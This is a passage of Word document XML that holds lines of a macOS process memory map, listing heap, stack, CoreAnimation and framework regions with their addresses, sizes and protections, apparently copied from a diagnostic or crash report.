    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreUI image data      0000000118c98000-0000000118c9c000 [   16K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           0000000118e3d000-0000000118ea4000 [  412K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000118ea4000-0000000118eed000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000118f49000-0000000118f4b000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 0000000118f4b000-0000000118f4c000 [    4K] rw-/rwx SM=NUL  /System/Library/PrivateFrameworks/CoreNLP.framework/Versions/A/CoreNLP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000118f95000-0000000118fde000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000119027000-0000000119070000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          00000001190b9000-0000000119102000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000119226000-000000011926f000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE (empty)   00000001192af000-000000011931d000 [  440K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011931d000-0000000119342000 [  148K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011947a000-00000001194c3000 [  292K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000119687000-00000001196aa000 [  140K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      000000011970d000-000000011972b000 [  120K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000119733000-0000000119755000 [  136K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          0000000119830000-0000000119b21000 [ 3012K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000119c53000-0000000119c78000 [  148K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000119cba000-0000000119cde000 [  144K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image               000000011efa6000-000000011efa8000 [    8K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000011f239000-000000011f672000 [ 4324K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC_LARGE_REUSABLE  000000011f8e6000-000000011faf2000 [ 2096K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data      0000000120a76000-0000000120ac5000 [  316K] rw-/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE           00000001228ad000-0000000122c01000 [ 3408K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000122dcf000-0000000123478000 [ 6820K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            00000001237ae000-0000000123b67000 [ 3812K] rw-/rwx SM=COW  /private/var/folders/fv/1m56tx611tb28kv27w07st6r0000gn/0/com.apple.LaunchServices-175-v2.csstore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000125292000-000000012593b000 [ 6820K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000126d36000-00000001273df000 [ 6820K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          0000000128131000-00000001287da000 [ 6820K] rw-/rwx SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600000000000-0000600001200000 [ 18.0M] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_NANO            0000600001200000-0000600001600000 [ 4096K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600001600000-0000600001c00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600001c00000-0000600002600000 [ 10.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600002600000-0000600002c00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600002c00000-0000600003600000 [ 10.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600003600000-0000600003a00000 [ 4096K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600003a00000-0000600003c00000 [ 2048K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600003c00000-0000600004a00000 [ 14.0M] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600004a00000-0000600005600000 [ 12.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600005600000-0000600005800000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600005800000-0000600005c00000 [ 4096K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600005c00000-0000600006000000 [ 4096K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600006000000-0000600012800000 [200.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600012800000-0000600012a00000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600012a00000-0000600013000000 [ 6144K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_NANO            0000600013000000-0000600013600000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600013600000-0000600014800000 [ 18.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600014800000-0000600014e00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600014e00000-0000600016c00000 [ 30.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000600016c00000-0000600017200000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608000000000-0000608000e00000 [ 14.0M] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608000e00000-0000608001000000 [ 2048K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608001000000-0000608001400000 [ 4096K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608001400000-0000608001800000 [ 4096K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608001800000-0000608001e00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608001e00000-0000608002400000 [ 6144K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608002400000-0000608002a00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608002a00000-0000608003000000 [ 6144K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608003000000-0000608004200000 [ 18.0M] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608004200000-0000608004400000 [ 2048K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_NANO            0000608004400000-0000608004600000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608004600000-0000608005c00000 [ 22.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608005c00000-0000608006000000 [ 4096K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608006000000-0000608011a00000 [186.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608011a00000-0000608011c00000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608011c00000-0000608012800000 [ 12.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608012800000-0000608012a00000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608012a00000-0000608013000000 [ 6144K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608013000000-0000608013200000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608013200000-0000608013400000 [ 2048K] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608013400000-0000608013600000 [ 2048K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608013600000-0000608014600000 [ 16.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608014600000-0000608014c00000 [ 6144K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608014c00000-0000608017600000 [ 42.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO            0000608017600000-0000608017a00000 [ 4096K] rw-/rwx SM=PRV  DefaultMallocZone_0x10a050000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stack                  00007000072f9000-000070000737b000 [  520K] rw-/rwx SM=PRV  thread 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  00007000073ff000-0000700007481000 [  520K] rw-/rwx SM=PRV  thread 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  0000700007482000-0000700007504000 [  520K] rw-/rwx SM=PRV  thread 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  0000700007505000-0000700007587000 [  520K] rw-/rwx SM=PRV  thread 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  0000700007588000-000070000760a000 [  520K] rw-/rwx SM=PRV  thread 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  000070000760b000-000070000768d000 [  520K] rw-/rwx SM=PRV  thread 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  000070000768e000-0000700007710000 [  520K] rw-/rwx SM=PRV  thread 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY            00007fbdaf400000-00007fbdaf800000 [ 4096K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdaf800000-00007fbdafa2b000 [ 2220K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafa2b000-00007fbdafa2e000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafa2e000-00007fbdafa63000 [  212K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafa63000-00007fbdafa66000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafa66000-00007fbdafb89000 [ 1164K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafb89000-00007fbdafb8b000 [    8K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdafb8b000-00007fbdafc3b000 [  704K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_SMALL           00007fbdafc3b000-00007fbdafc3e000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL (empty)   00007fbdafc3e000-00007fbdb0000000 [ 3848K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0000000-00007fbdb08e7000 [ 9116K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb08e7000-00007fbdb08ec000 [   20K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb08ec000-00007fbdb099b000 [  700K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb099b000-00007fbdb099e000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb099e000-00007fbdb0a76000 [  864K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0a76000-00007fbdb0a79000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0a79000-00007fbdb0afe000 [  532K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0afe000-00007fbdb0b06000 [   32K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0b06000-00007fbdb0b75000 [  444K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0b75000-00007fbdb0b78000 [   12K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0b78000-00007fbdb0b7f000 [   28K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0b7f000-00007fbdb0b81000 [    8K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb0b81000-00007fbdb1800000 [ 12.5M] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_TINY            00007fbdb1800000-00007fbdb1a00000 [ 2048K] rw-/rwx SM=COW  GFXMallocZone_0x10a062000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY            00007fbdb1a00000-00007fbdb1e00000 [ 4096K] rw-/rwx SM=COW  QuartzCore_0x10dff9000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY            00007fbdb1e00000-00007fbdb1f00000 [ 1024K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
